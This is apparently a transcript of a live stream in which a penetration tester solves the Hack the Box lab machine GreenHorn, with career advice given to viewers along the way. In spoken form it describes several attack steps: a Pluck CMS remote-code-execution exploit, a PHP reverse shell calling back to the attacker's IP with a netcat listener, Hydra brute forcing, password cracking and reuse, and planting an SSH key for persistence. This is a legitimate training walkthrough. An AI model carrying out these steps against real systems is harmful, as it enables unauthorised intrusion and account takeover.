Hello, welcome to the stream. Thank you so much for stopping in. Today we are going to be doing GreenHorn on Hack the Box. This is a black box challenge for me. I haven't done this challenge before, nor have I seen a video on it or a write-up. So this is all going in blind, which makes it fun and challenging. And I do that to, one, continuously challenge myself, but also to help those who are new to the field understand my methodology, and they can see me struggle a little bit, because even as a professional penetration tester who's been in the game for a little bit of time now, I still face my fair share of challenges. So that being said, let's go ahead and dive right into it. This demo is for educational purposes only. Ethical hacking is legal and differs from illegal hacking. Always ensure you have legal permission before performing what you see in this demo. Alright, as you can see here, we have GreenHorn on Hack the Box. It is a Linux machine and it is easy. We already have it spun up, so we just gotta click this to copy the IP address on our clipboard, and we can run our Rust scan, which is a very fast port scanner. It uses IMAP in the background. I didn't want to copy Hack the Box GreenHorn. I don't know why that got copied. I wanted to copy the IP address. Let's try that again. There we go. Let's go ahead and run that. We have 22 open, we have 80 open, we have 3,000 open. Alright, let's go ahead and run one more time. Sometimes Rust scan is so fast that it misses ports, so I will run this one more time. And the results are the same, so I feel pretty confident in these being the ports. So I'm going to take this, put it in my notes, and then move on. So I see 80 open. That is a very lucrative thing to go after next. So I want to go to the IP address. Why? Oh, that's because I copied that in my notes. http:// let's go ahead and get our IP address again. Copy. Okay. http:// paste the IP address. See what we get here. So it got redirected to GreenHorn HTB, as you can see here, and you can also see that same thing right here, GreenHorn HTB. So when you get that in Hack the Box, you just need to do a mouse pad and a /etc host or your text editor of choice. This is sightless. That was the last Hack the Box machine we did. Let's go ahead and paste the IP address here, and then put greenhorn.htb, and we will save that. Close. Now if we go back to Firefox and we refresh, it should load up a web page, and we do. Welcome the new junior. Okay, so we got Pluck here. What's up, Luffy Teru? Are you doing this in real time, or is this a pre-recorded video? This is real time. This is live. I don't do pre-recorded videos on Twitch. If you guys want pre-recorded videos on Twitch, we can look into that. But if you want to watch the pre-recorded videos, check out my YouTube. But yeah, welcome to the stream, Luffy. Thank you so much for stopping in. Glad to see you here. But we are live. We are alive and well. Okay, so we got this web page here. No, you are really quick, so I got confused for a second. Oh yeah. Well, I mean, this is like my 112th Hack the Box machine, 113, something like that. So I've done a lot of Hack the Box, even though I've never done this machine. I don't know if you heard me at the beginning of the stream. This is the first time I've seen this. Never seen it write up, never seen a video, and I've never done it. As you can see, I got 0 points on it. I've never done it. It's got 2.9 stars, so someone didn't like this. A lot of people didn't like this. Out of 831 reviews, so yikes. Alright, next thing I want to do, before we get going with the web app stuff, let's do an mmap dash st dash. We're actually going to fill out this whole thing. No, we're not. Let's just do a. I actually changed my methodology. I don't do the dash sv dash sa dash 0 dash o dash sc all together anymore, because dash a does do it all, and dash a by itself is more than enough. Plus, the script vuln is actually something that is detrimental to defining. So this is something you want to run after the fact. Anyways, we'll do dash st dash a dash p in, and then we will paste our IP address. And I think that's all we need to do. No, we don't. We need to do a dash p 2280 and 3000. Let's see what we get here. So we gain. Give me a second. Whoever just commented on LinkedIn, I gotta load up LinkedIn on the other tab because it just says LinkedIn user commented and I can't see your name. That's one thing I hate about LinkedIn. What's up, Cody Miller? Thanks for stopping in. I appreciate you being here. How you doing today? All right, back to this. So we got file. Welcome to GreenHorn. Dear aspiring web developers, welcome to GreenHorn Web Development. We are thrilled to have you join our community dedicated to helping juniors kickstart their web development careers. At GreenHorn, we believe in providing the resources and support you need to succeed in the exciting world of web development. Whether you're a fresh graduate, switching careers, or simply passionate about coding, you've come to the right place. Our mission is to guide and empower you through the web development journey. You'll find a wealth of educational content, tutorials, hands-on projects, and a supportive network of fellow learners of experienced developers who are here to mentor and assist you along the way. We're excited to see you grow and learn and contribute to the web development community. The journey may have its challenges, but remember that every experienced developer was once a junior like you. Your dedication, curiosity, and hard work will lead you to success. Feel free to explore our website, join our forums, and take advantage of the resources we offer. If you have questions, need advice, or just want to connect with like-minded individuals, our community is here for you. Welcome to the world of web development. Let's code, learn, and grow together. Your future as a web developer starts here at GreenHorn. Best regards, Mr. Green. That might be a potential username, Mr. Green. What's up, Julio? Thanks for stopping in. Glad to see you here. And Adder, thank you so much for stopping in the stream. How are you doing today? So this is posted by admin? Or are we already the admin? So if we click this, we can go to login.php. We got pluck 4718. That's very interesting. Let's look that up. Pluck 4, what did I say? 417. Oh, it's right here. 4718. 7.18 exploit. Remote code execution. Say less. This is a looks like Python to me. Let's go ahead and copy this. And let's go ahead and let's just run it. Let's see what happens. I mean, it's on exploit DB, so it should be decently safe. I'm not saying it's impossible to get malicious exploits off exploit DB. They do have to get vetted to be put on there, but it is still potentially. I mean, I looked at the code. I didn't see anything crazy. Let's double check it though. I'm gonna say this is all right. I'm gonna say this is alright to run against on my machine. Alright, let's do change directory, hack the box, make directory. What's the name of this machine? GreenHorn. And then we are going to do change directory GreenHorn, and we are going to do nano. Let's do rce.py, and we'll paste this in here. And we do have to modify it. We need to replace localhost with our IP address. Actually, no, we have to replace it with greenhorn.htp. And I think that's the only thing that we have to modify. Let's just double check that. Let's just look through this. I don't think we have to change anything else. Hopefully this works. Okay. Go ahead and save that and do python 3 rce.py. See what happens. Nothing. What do we got? No module name request toolbelt. I don't know if it's my place to say, but please, the quality of the video. The quality of the video should be 1080p. If you are having a hard time seeing it, it's probably on your end, I would imagine. But I could be wrong. If you guys, that came from LinkedIn. If you're watching on LinkedIn, let me know how the quality is for you. What's up, Trey Black? Welcome to the stream. Thanks for stopping in. Glad to see you here. We have Hack the Box GreenHorn going on. That's what's up. How about you? How you doing today? All right, so we need to import requests toolbelt. So we can do. What if we can do like? Is it pip? Can I just do a pip x install requests toolbelt? Well, if you spell install right, that might actually work. Let's see if that works. No apps associated with package request toolbelt. No module name request toolbelt. Where does request toolbelt come from? What if I just do requests? So let's just import requests. Wonder why is request not in here? I think it's apt install python 3 dash requests. See if that works. Request is already the newest version. Request toolbelt, is toolbelt in here? I just want to run the script. I can't. What if we do requests underscore toolbelt? I'm just gonna take all of this. We're gonna ask ChatGPT what to do. I don't know. It says it's already installed, but it isn't saying it's not installed. Is it just pip? Pip. So, ChatGPT's. This is what confuses me. Like, sometimes you gotta use pip x, sometimes you gotta use pip, sometimes you gotta use pip 2, 3. Like, jeez. I wish there was a more simple way to make it consistent. Pip install requests toolbelt. Yeah, this is another thing that I hate. They recently changes. They do this for protection, but honestly, let's just say screw it and break system packages. This is one thing I found out. Like, I kept getting this. I'm like, dude, what the heck is this? Like, to get rid of the pip install, and they tell you to try app install python dash whatever your xyz. We already tried that. The app install python dash xyz, like, this almost never works. I think I've gotten it to work like one time. So if you guys run in this error, if you just read, which is something I used to not do as much, but if you actually read the errors, it just says just put in break system packages here. Could potentially break your system, but this is a VM. I take regular snapshots. So if it breaks, I just revert. Can I find a version that satisfies the requirement request toolbelt from previous none? Let's get rid of toolbelt. Oh, you know what? I think it's because I didn't have an S here when I ran it the first time. See? That's where I messed up. Okay. Did that work? It says already satisfied. Can I run the script now, dude? Let's see. Probably not. I don't think it actually installed anything. Zip file path. Oh, it's actually working now. Zip file path? What does that mean? Let's see here. I don't know what zip file path is supposed to mean. Let's look up. Let's duplicate this tab. Go back in this one. Let's see if we can find some other code here that tells you how to use it. You'll be prompted to enter the path to the zip file. Zip file path to payload.zip. Create a payload.zip file containing shell.php, hackerman, pentest, PHP, reverse shell, and replace your IP import. Create a payload.zip file containing shell PHP. Got it. Okay, easy enough. So we just got to go to pentest monkey reverse shell. So we'll click on this. Very common PHP reverse shell. Use it literally anytime I run across RCE in a PHP environment. So let's just open up a new tab here on Kali, and then we're going to do nano shell.php. We're going to paste pentest monkey in it here, and we just gotta change the IP address and port in this code. Access granted. Lancelot 007, thank you so much for following over on Twitch. I appreciate your support. Alright, so for IP, this is our attack IP. My hack the box IP address is 10.10.16.32, and then the port, don't need to change it, but I like to change it to 443, and that's all we have to change for here. Now all we have to do is, if I create a zip file, is that what it said? Create a zip file. Create a payload.zip file containing shell.php. So if we go into hack the box, GreenHorn, can I just do right click? Alright, so if we do a zip payload.zip shell.php. I had to ChatGPT that by the way, because I didn't know the exact syntax to do that. It's pretty self-explanatory, but I just wanted to double check so I didn't break a file or something. Okay. So push enter on that. Now we have a payload.zip. So now we can come back over here. The path to the file would be /root/http/greenhorn. We also probably need to start up a listener. Let's do a netcat-lnvp actually, let's clear this out first. Now let's do a listener netcat-lnvp 443. So now we're just waiting for a connection. Root hack the box greenhorn /payload.zip. Push enter on that and the script broke. Let's look at it. No shell. Okay. Well, I thought that was gonna work. Connection refused. Wonder why. Let's go back. Let's do a mousepad rce.py. Let's look at this again. This is the whole script? Yeah, I can't scroll down. Okay. Let's where's the URL? That's, oh, here we go. What, didn't I change this? I could have sworn I changed this. So that's why it didn't work. So we just got to change this to greenhorn.htp. I could have sworn I changed that, but greenhorn.htp. Let's go ahead and save that. That should work. Let's try that one more time. Okay, the path to the zip file is /root/http/greenhorn/payload.zip. Still got an error. Will we get the same thing? Connection refused? Or did we get a different error this time? I think it just looks like it's creating a connection. No shell. Go back into the script. Let's go back over here. Maybe. Ah, okay. I see now. See this? There's no pluck. If we get rid of the pluck, and our URL, then we should be fine. Let's try that one more time. So this is where we went wrong. We got to delete pluck out of here. Let's try that. Is there, wasn't there another one? Or what? Alright, I think that should work. Let's try that one more time. Zip file path is /root /HTTP /greenhorn /payload.zip. Push enter on that. I think we made progress that time. I could have sworn I seen it saying uploading zip. No show. I still think it's having problems with the connection. Failed to resolve. I think, let's go back into the code. Let's look at this really closely. There might be another section where we got to change the URL. Greenhorn.htb, login.php, greenhorn. I don't see anything else to modify that would make this work. Unless I spelled greenhorn wrong. Greenhorn.htb, no. Greenhorn. Okay. Not sure why that's not working. I was pretty confident this was going to work. That's why I've been spending so much time on this one script. Everything looks right to me. Let's see if we can... Let's see if there's like a Metasploit model for this or something. Search for pluck and see if there's a Metasploit model for this. Could help us out a little bit better. Nothing for pluck. Okay. You know, maybe it needs a shell.rar file. Maybe I need to log. Maybe I need to have credentials. Maybe that's what the problem is. No, it says unauthorized file uploads. I don't know why it says username though in the code. Replace with your host name. Replace with your username. I don't know. I don't have a username and password. So do I have to have a username and password? That's probably what's wrong. Let's look up pluck default credentials. Pluck default credentials. It just asking for a password. What if I just type in password, see if that works? Nah. Admin? Pluck. Yeah, so that's... I think that's what's wrong here. Where did this thing come from? That's what I'm confused about. They asked for a URL 3 different times. But I'm not seeing it here. Oh, there we go. Now I can scroll down. This is what's wrong. I have to get rid of this pluck. We'll see that. I knew there was another part where you put the URL. I tried to scroll down, but I guess it didn't work unless that was full screen. Okay, let's try that one more time. Zip is in root / hackthebox / GreenHorn / payload.htb. No, payload.zip. There we go. Still not working, dude. Retries exceeded. Go to the IMAP results. We got something on 3000. Who knows what the heck that is? I'm gonna ask ChatGPT what the default password is for pluck. It doesn't have a default password. Wonder if we have to... Let me give it this code. And see what it says, if I need a password or not. Yeah, it says I need the admin credentials. That's what I thought. So let's see if we can figure that out. Let's hit F12 here and we'll do password test. We'll hit network. It's already on network. Login. Don't save. Here's a post request right here. And we want to go to raw request. Raw. So let's see if we can figure out what the password is. If we can figure out what the password is, we'll be sitting good. So what we need to do is go ahead and there's many tools that can do this. Oh my gosh. I'm going to use Hydra. Because Hydra, when it works pretty well. But the problem is it doesn't work that often. So if it doesn't work, we'll have to go to another tool. Alright, so the password is admin, but I don't want to put in a password at all. Can I just... omit that part, the -L option? I don't know. This is one of the problems with Hydra. If it doesn't have a -L, is it still going to work? Alright, so for the URL, it is greenhorn.htb, and then the request is right here, so we'll delete all of this. Oops, don't want to delete that colon. Oh, that's the whole code. I'm not going to do that. No. Oops. I always do that. I think something else is in my clipboard than it actually is. Has anybody else done that? I'm sure someone else has done that that's watching this right now. It's going to be easier if I just don't delete all of that. Let's try this again. Hydra. There we go. It's going to be faster if I do it this way. I could have sworn I copied this in my clipboard. Copy. Now I need to grab this. You've exceeded the number of login attempts. Please wait 5 minutes before logging again. I've only tried like 2 times. There's a throttle. Well, brute forcing is not going to work. If I can manually... Yeah, if I can manually hit the exceeded number of login attempts, then brute force is not the way. Okay, well, that's interesting. So that exploit looks like it would work if I had an admin password. Let's do greenhorn.htb:3000. See if we can go here. Come on, man. I didn't want to do a freaking Google search. http://greenhorn.htb:3000. Okay, we got some Git. This is some Git tea. Oh, look at this. This is the source code. Oh, nice. Well, I asked ChatGPT earlier what the default password was, and it says it doesn't. There isn't a default password, but it's set, and you can change it in the data settings past PHP. So if we go to data settings, see if we can find past PHP. There it is. That's the password. This is the password, bro? That's a long password. Good thing we checked port 3000, huh? Okay. Let's go refresh. See if this is the... It still says login. Might have to wait 5 minutes. Yeah. You're on the right path. Thanks, Lancelot. I'm glad this is actually a thing. You've exceeded the number of login attempts, because I was about to start brute forcing this, and I would have sat here and waited for 20 minutes until giving up on that, which is typically what I do for a CTF or a certification exam. If brute force doesn't work in 20 minutes, I call it. It's probably not the way in. So seeing that, instead of going through with the brute force, well, technically it's a dictionary attack. Instead of going with the dictionary attack, I was like, whoa, I have nothing else I can try. Let me try port 3000, and then boom, found the Git, and then found the password. I think it's the password. I mean, it says past PHP. This is probably the password. We just gotta wait until we can log in again. I don't know what would be faster, waiting for the 5 minutes or reverting the machine. There we go. See if it will just let me log in with this password. Log in. Seated. You know what? Let's just revert the machine. I don't want to wait any longer. Let's just revert it. It'll work. This is only going to take me a few minutes. I don't want to wait 5. This will probably only take 1. I was saying, in the meantime, we can look at the other source code, but we can't because we took the machine down. But look at the password, dude. That's pretty cool. I think. We'll see. Should be the password. I couldn't imagine not being a VIP plus, because VIP plus I got my own instance. You would never be able to get a shot at this because there'd be so many people trying to log into that panel. You would never be able to try it because it'd always be exceeded, because there'd be, I don't know how many people get put on a box. That's a good question. I don't know, but I don't like sharing boxes. It's definitely worth the $20 a month for me. Even though I only get on Hack the Box now once every 3 weeks. Alright, all we have to do is open up a new tab and do mousepad / Etsy hosts and replace this IP with this IP and save and exit. Now if I refresh this, we should not be exceeded. Now let's go back over here, grab our password, which I believe is the password, see if that works. It says incorrect. This might be a hash. This might be a password hash. Let's see if it's a hash. Hashes.com. That doesn't go there. That goes right here. PCFFSZ. And then paste this in here. See if it's a hash. It is. I love you 1. Perfect. That's the password. Alright. We're in. Now we can go back to our script that we were trying so hard to get to work earlier. Do a mousepad rce.py. We just need to put our password in here. So I think cont1 is the password. I think if I just put that right there, that should work. So we got our listener up. Alright, let's run this one more time. I'm pretty confident this is going to work. Root HTTP / GreenHorn / payload.zip. Still not working, dude. No shell. Cont1 equals I feel like we have everything we need. I don't know why the script's not working. What if we tried a different script? Let's try that. Let's try this other script over here. Let's do nano. Let's do remove rce.py. Nano rce.py. Paste this in here. Now if we go up here, replace your host name. Host name is greenhorn.htb. I don't know what the username is. Let's see what that is. We're logged in, so we should be able to see some sort of username here. Log out, options, change password, general settings. It might just be admin. I'm thinking it's just admin. See if we can change password, old password, new password. I'm gonna assume we're admin. I'm just gonna take a guess here and say we are admin. So let's just put admin in for the username field. Admin, and then the password is it was like I love you 1 or something. Let's copy this, paste this here, save the file. Alright, this is a different script. Let's see if this one works. Path to zip file. Same thing. /root /HTTP /greenhorn /payload.zip. Oh, okay. Login successful. Zip file successfully. Upload successfully. We got a freeze here. Let's check our shell. We have a shell. We're in. Look at that. Alright, let's do who am I? We're data. Let's do change directory home. See what users are on here. We got get and junior. We got a junior. Cat user.txt. Permission denied. Okay, so we have to elevate to the user junior, which is A-okay. Let's get the shell stabilization command here. Let's type that in, and then we'll do so this is interesting, using openvos.pdf. That's a vulnerability scanner. Change directory get. Oh, access is denied. Let's do change directory to the root. Let's go here. Anything sticking out to me? No, I'm not seeing it. Can we do a sudo -l? We don't have the password for data. I mean, maybe we do. Let's just try I love you 1. Okay, well, let's do switch user junior. I love you 1 as a password. We're in. We didn't even TIY Grail. Thank you so much for subscribing on YouTube. It's funny, we didn't even need to use this exploit at all. We didn't need to get remote code execution at all. Like, that password, just simply cracking that was all we needed. We did not need that script at all. We went above and beyond there. So let's just do clear this out, SSH junior at greenhorn.htb. Yes. Permission denied, public key. Maybe we did. Maybe we did need to do RCE because it's not accepting. It's not accepting SSH logins. I don't think. Yeah, I think we definitely did. Okay. Change directory to Junior's home here. We'll do cat user txt cat user.txt. Am I not in? There we go. I don't know why did it not work the first time. I did cat user txt, but I thought I did 2 R's. That's a little weird. Okay. That is a user flag. Come back over here and submit this. Oh, I'm in adventure guided mode. I want adventure mode. Flag. Here we go. What's up, Axasia? Thanks for stopping. Glad to see you here. Is GreenHorn hard? Honestly, this was very easy. That first flag was very easy, in my opinion. We'll see what the next flag's like. Let's do ls-la. Do we have an SSH key? Change directory .ssh. We don't have a SSH key. So let's do change directory dot. Do I have a? Let's do remove hydra restore. We don't need that file in there. Clean it up a little bit. I'm trying to have some persistence here. I want to get an SSH shell. I'm going to put a key. I thought I had a key in here, but I guess not. We're going to have to make one. We're going to have to make an SSH key, and I forget the commands how to do that. So I have to look that up real quick. So I make sure I got all the flags correct and everything. So what we're going to do is we're going to go to change directory here. Now let's put it in my, no, I don't want to put it in tools. We'll put it right here. Alright, so we just got to run this command ssh keygen-trsa-b 4096-f. We're going to call this ctf dash or underscore id rsa. That's what this purpose of this key is for me to put on like CTF boxes. That should work. I don't want to passphrase. If I do ls, it should be in here. So what I need to do is I just need to transfer CTF ID RSA onto our target. So let's do Python 3. Actually, I want to move CTF ID RSA to CTF ID RSA lowercase. This capitalization seems annoying. And we're going to do the same thing with .pub, and .pub. There we go. Would you say hacked machines are close to OSCP machines on the exam? I know OSCP, they're very into the AD. Yeah, the new OSCP is more AD than the previous OSCP. So you're gonna have 6 machines in your exam for OSCP. 3 of them is gonna be part of an Active Directory set, and the other 3 are standalone machines. Those 3 standalone machines are very similar to hack the box machines. This machine that we're doing right now would be something that you would see on OSCP exam. This is very similar. I would say a lot of the modern hack the box machines are actually harder than the OSCP exam, but there's also a bunch of ones that are like the old hack the box machines that are easy. Those are easier than OSCP, but the newer ones, the ones that came out the last year or two, generally speaking, is harder. This one right here, this one's about the same, maybe a little harder. It depends on how this privilege escalation goes. But this one's been pretty easy so far. So this one's probably a little easier than OSCP machine, but hack the box is a great practice for OSCP nonetheless. Hopefully that answered your question. I highly recommend doing one hack the box machine a week on top of your OSCP studies, just so it exposes you to other tools and stuff that the OSCP doesn't teach you. And I hate to say it, but there's stuff in the OSCP exam that you're gonna have to know to pass that they do not teach you in the course. They do that on purpose. And a lot of people don't like that, but that's the reality. Alright, back to what I was doing. So we need to do a Python 3-MHTTP server. So tryhackme is good for what? Tryhackme is good to get started. Especially if you're on a budget. Tryhackme has a lot of free rooms, and even the paid Tryhackme is cheaper than the paid Hack the Box Academy. Tryhackme is good to get started and to learn the fundamentals. And then once you learn those fundamentals, Tryhackme doesn't really serve you too much unless you're doing some of those advanced learning paths. I generally recommend doing all the relevant Tryhackme learning paths. And if you want to know what I mean by relevant, it depends on what kind of job you're going to go for. If you're trying to be a pen tester, for example, you want to do all the pen testing learning paths. And then once you do all the pen testing and redteaming learning paths, on top of the fundamental ones, there's fundamentals as well. Make sure you do those first, and then go into the pen testing learning paths. And then once you do all this pen testing learning paths, it's time to hop over to Hack the Box and start practicing like what I'm doing here. And I think it's important. And I'm not just telling you to do something I don't believe in, because I literally do it every week, and there's a reason why I do it every week, because it keeps my skills sharp. Even though I already have an OSCP certification, even though I already work as a full-time pen tester, this right here, just doing this every week, really helps a lot. Alright, so what we did was we were serving a Python 3 server that's hosting all these files. So now if we go back to our shell, we can actually close out of this. or here's our shell. Let's do a wget http // no, make directory dot ssh change directory dot ssh. I think I gotta make another folder as well. What? Where do I? How do you take notes on pen test or hack the box? So I'm not the best note taker in the world. That's actually one of the weaknesses I have. But what I do is for a CTF or a exam like the OSCP, I just copy interesting input and put it in my OneNote. I use Microsoft OneNote and I just throw it in there. Like, don't organize it at all. And then if it's relevant, once I finish the machine, or like for example like an OSCP, then I will go back and retrace my steps and make my notes fine-tuned. And then once I make my notes fine-tuned, then I will put it into a finalized report and submit the report for an exam, for like an OSCP exam, for example, or like a TCM security or a hack the box exam. For a hack the box, my notes are not that good. I'm just generally not interested in recording all the notes, mostly because if I absolutely need to know how I exploited the thing, it's streamed, so I just go back and watch it, or I can just go read someone else's write-up. There's a write-up for every hack the box machine, so I'm not really interested in documenting the process. However, if I learn something new, something that just blew my mind that I just didn't know before, I'll take good notes on that. But if it's something that's routine, then I'm not taking notes on that. Like all this stuff so far is like pretty routine up for this machine, for example. So I haven't taken any really notes. The only thing I have in my notes right now, I'll show you. Literally this. Like I just have the in map. That's all I have. This is what my notes look like right now. Now, if I was doing an exam or an actual pen test, there would be way more. Like every command that I ran, I would throw in, I would just paste the output, and like typically my notes would look like something like this. Like I would just like paste like random stuff all over the place, and it's just kind of all mumbo jumbo. Let me find an example of that. So here is these are like what my refined notes would look like. So this is Inject. This is another machine that I did. You can actually watch the video on YouTube. But yeah, I got the flag that I capture, which doesn't really matter that you put that in your notes or not, because it changes every time you reboot it. Yeah, I just like, this is, you know, I did an map scan, and then let's see here. I went to the IP address :8080, and then I went into uploads, and then I uploaded a file to here, and then I found CVE, and basically it told me to do this exploit CVE with metasploit, the Spring Cloud function, and then I have fill password located here, and then I just switch user to fill. That's kind of that's like refined. It's not very good notes, honestly, but that's kind of like, if I was writing a report, it would be way more detailed. But for a CTF, I don't think that good notes, to be honest with you. On a real pen test, the notes are a lot more in depth as well. Hopefully that answered your question. All right, I'm here now on not on LinkedIn. What's up, Tech with Cody? Cody Miller. Okay, I actually didn't make that connection. So Cody Miller is technical Cody. Got it. Boom. What's the best site/program to use for doing reports? Honestly, it's just a preference. For reports, we use PwnLab at my company. Not PwnLab. PwnDoc. But even then, it's not perfect, but it's better than nothing. I've also seen another popular one's PlexTrack. There's other ones out there. I think PlexTrack is probably the most like premium one. I'm taking HTTP CPTS next month. I need a good reporting tool. Yeah, I mean, there's multiple other ones out there, so you have to do your research. But we're using PwnDoc at my company, and I know PlexTrack's another one that you might want to look into. All right, so we need to make another directory called authorized keys. No, we need to navigate into authorized keys. Oh wait. Did I spell authorized keys wrong? Change directory. Oh, well, let me paste. Oh my gosh. AUTHORIZED keys. Oh, I'm already in authorized keys. Duh. Okay. Now we need to do a wget http://192. No, not 192. 10.10.16.32 slash id no ctf id dash rsa dot pub, and we call this ctf id rsa dot pub. Actually, let's just call it id rsa dot pub, like that. If we do ls, did it work? We're gonna set 200 here. Finish. Do ls. Okay, there's CTF ID RSA pub. Okay, I didn't mean to call it that, but that'll work. So now I should be able to log in. SSH dash I CTF ID RSA junior at greenhorn.htb. Permission denied, public key. Wonder why. Oh, I know why. I need to change the permissions. So we need to do, oh my gosh, I can't just copy and paste these. We need to do a chmod 700 on the .ssh directory, and then we need to do a chmod 600 on SSH. No, we don't even need to do it. Just on. Oh yeah, we do. Authorized keys. Nope. .sh. Authorize keys. There we go. Let's see if that works now. Still permission denied. I just want to log in through SSH, that way I can have a better shell. But I don't think it's going to work. Let's just do... let's just do this. This OpenVOS PDF is going to probably show us some vulnerabilities here. What's up, Cypher? Welcome back. How you doing today? So let's host a Python 3-m http.server on port 8080 here, and we're just going to copy this, and we're going to go back over to my Kali Linux here. Clear, change directory, hack the box into GreenHorn, and we're going to do a wget http greenhorn.http colon 8080 slash using OpenVOS. We need to put that in quotes, I believe. What the heck is up with this? I hate that about Kali sometimes, how it puts like these word characters in here when you paste. It's the literal worst. I don't know whose idea, like I don't know why it does that or why that's even a feature, but it needs to die. Using openvos.pdf. Does that work? Can we do, let's open that up. Let's go into hack the box, GreenHorn, OpenVOS PDF. Okay, here we go. We got some. We've recently installed OpenVOS on our server to actively monitor and identify potential security vulnerabilities. Currently, only the root user, represented by myself, has the authorization to execute OpenVOS using the following command: enter password. There's got to be a way to deobfuscate that. As part of your familiarization with this tool, we encourage you to learn how to use OpenVOS effectively. In the future, you will have to have the capability to run OpenVOS by entering the same command and providing your password when prompted. Feel free to reach out. So if we do a sudo-o, we might be able to just run that. That's a huge hint, which we should already ran sudo-o, but we didn't. Let's do oh, gross. I have to re-exploit this now. That's unfortunate. Lost my shell. Let's do Python 3 rce.py zip file path is in root / http greenhorn / payload.zip. Do I have the listener running? I do. Okay, got my shell back. Easy. All right, let's do this. Oh, we gotta switch user to Junior. I love you 1. Sudo-l. I love you 1. Sorry. User junior may not run sudo on GreenHorn. So yeah, that's what I was thinking, Lance. I figured I could deobfuscate this password, but I wanted to check this. But if I, as part of your familiar tool, we encourage you to learn how to use OpenBoss effectively. In the future, you'll also have the capability to run OpenBoss by entering the same command. It says in the future. But this might be the root password, so we gotta figure out how to deobfuscate a PDF. How to unblur PDF. Had a sandwich attack this morning, but at least your video is going. What is a sandwich attack? Alright, so ChatGPT, I've never done this before, so this is new for me. ChatGPT is telling me to do this. Install this. And then run this so that, well, I gotta install the tool, I guess. I don't know. I guess that first one didn't actually install it. Failed. Wonder why it failed. Failed to fetch. App install. Well, let's do a apt get update. That might be the reason why I can't find it. And let's run pdf top m. And let's see if that will install now. Looks like it's working. There we go. Go ahead and hit OK. Okay, now let's try pdf topm dash png input pdf png. And then we will do output. And it says run this thing on the images. Did I get a new file? So I got output 1 PNG. So see if that works. Cat output text txt. It actually worked. Enter password. Saki es equals. That's the actual password. Wow. Let's see if we can just switch user to root. Wonder if that's right. That might not even be right. This tool might have been broken. I don't know. I hope that's the password. It's acting like it is. But I'm not sure. Push user root and we'll paste that password in. That did not work. Let's look at that PNG file. Let's see if that works. So we have a PNG. Let's see if it did nothing. Here's another tool, PDF to text. Using password.txt. Cat password.txt. I don't have a password. It says enter password, so this is still obfuscated somehow. Okay, so that didn't work. I'm just trying to find a tool that might get this done. I guess I should show you my screen. I'm on ChatGPT just asking it questions. So it told me. So I asked it to I said, how do I take pixelated text and deobfuscate it in a PDF? And that's what I tried just now. Was this? I didn't try to. And if text is initially redacted, which it is, and then I tried number 4. Number 4 didn't work. And then I just said, hey, the text is intentionally redacted, but it's using a weak blur tool. What's a tool I can use? So that's where I'm at this point. What's up, Wire Dog? How's it going, man? The goat. We need to have a goat sound effect every time Wire Dog just pops in here. So it's telling me to do this. Let's try this. I'm gonna move this to the monitor so I can multitask here. It's saying get this thing. Of course. Dash break system packages. I've been running break system packages and nothing's broken yet, so we're usually a good workaround. Oh, alright, well that didn't work at all. Change directory. unblur.py. And what's the name of our file? I have no idea. We have output PNG. So we convert it to PNG. Let's see if we can just say Python 3 unblur.py. No module name CV2, so we'll do like pip install CV2 dash dash, I forget the break requirements, dash dash break system packages. Oh gosh, okay, of course. I wonder if there's a way to I gotta figure out how to unblur that. That's not the kind of blur I'm trying to remove. I don't know what I'm looking up, dude. I never learned how to do this. I don't understand this. There's no simple solution to this. Everything ChatGPT recommends is not working for me. Alright, so someone run this. See if that works. Dude, every time I get recommended a virtual environment, it just doesn't work. I hate virtual environments so much. Let's do it system-wide. See that virtual environment nonsense. Can I run Python 3 on blur.py now? Bad key, bad key. I don't know what that means, man. Can't even quit. Ah! Broken. Close. Alright, so I'm gonna update these packages here. Hopefully this just fixes it. I don't know. It'd be nice to just be able to run the script. We don't even know if the script's gonna work. Oh. It did something. Can I zoom in? Zoom in? Question mark? How does this thing work? I see. It looks like it might be blurred still, but I'd like to be able to just read that, but it's not letting me zoom in. Oh my gosh. How do I go back? Let me zoom in right here. Well, it's still blurred. So that didn't help. Not at all. What's up, Glad Shark? Thanks for stopping. I'm glad to see you here. Is that even the way? What's up, Raggy Boy? Thanks for stopping in. Glad to see you here. Hey man, love your content. I work in IT but have no certs. Should I get certs first or learn pentesting at the same time? Even if it splits my focus. Thanks. If you want to be a pen tester and you're already in IT, you've already done one of the harder parts is getting your first IT job. So at this point, I would say, that's a good question. If you haven't watched my pen tester roadmap video on YouTube, watch that. If you have already watched it and you need further advice, then I would say it just depends on where you're at. I would definitely get on Try Hack Me if you haven't been on there yet, and start doing the pen testing learning paths every day. And then also start working towards certs. Yeah, I think certs are really, really helpful. You can get certs and learn pen testing at the same time. That's what I would do. I wouldn't worry about splitting your focus. My focus has been split my entire career. I've been a college student since 2019. I got in the field in 2018. When I joined the military, I was in the military for just like a year and a half. And then a year and a half of my career, I started going to college. So I've been doing college with my certifications at the same time. Still to this day, I'm actually going for a master's degree. I'll get my master's degree in like a month and a half. Still to this day, I'm doing full-time work as a pen tester. I'm a full-time college student. I'm studying for certifications. I make content, and I still do hack the box to try to hack me. But that's all I do. I mean, I don't do anything else. So it's possible. It's definitely possible. But I wouldn't worry about splitting your attention. I think splitting your attention is actually good because, like, it's like, for example, if you're studying for a certificate, let's say you have 5 hours every day to study, or 5 hours to work on something, and you spend 3 hours studying for your certification, and then you spend 2 hours doing Try Hack Me or something. Like, you got 5 hours of good learning in. But if you study for 5 hours of certification, that last hour is not gonna really help you that much because you've been at it for the same thing too long. But when you switch gears, your brain can like recharge, if that makes sense, because you're gonna use a different part of your brain. And now it's gonna be very similar if you're doing pen testing certs and you're doing like Try Hack Me and stuff on the side, but still. I would do the answer is just do as much as you can at the same time. I've never been a fan of single focus ever. Now when I'm doing schoolwork, like I'm doing schoolwork, like I'm not doing nothing else for those 2-3 hours I'm doing schoolwork. But as soon as I'm done with those 2 or 3 hours of schoolwork, then it's like, all right, when I'm going to do certification studies for the next 2 or 3 hours, and that's it. So I'm saying like focus on one thing at a time, but it's okay to like divvy it up what you're doing it day to day. Like for example, yesterday, right now I'm reading a book called Practical IoT Hacking. I dedicated 30 minutes of reading that book. And then after that, I dedicated an hour to studying for a certification. And then after that, I dedicated a couple more hours to creating content. I just block off the time. Hopefully that makes sense. My answer is always do as much as you can. The more you do, the more you're going to stick out in the field. Because That's what employers are looking for. They're looking for people who are committed and dedicated to the field. And the more dedicated and committed you are, the more things you do, the better you look. Assuming you're a good person. Don't be a piece of crap and know how to talk to people. What's up, Julie? Thanks for stopping in. Glad to see you here. Yeah, I don't know what to do with this with this machine. I don't know if on blur is part 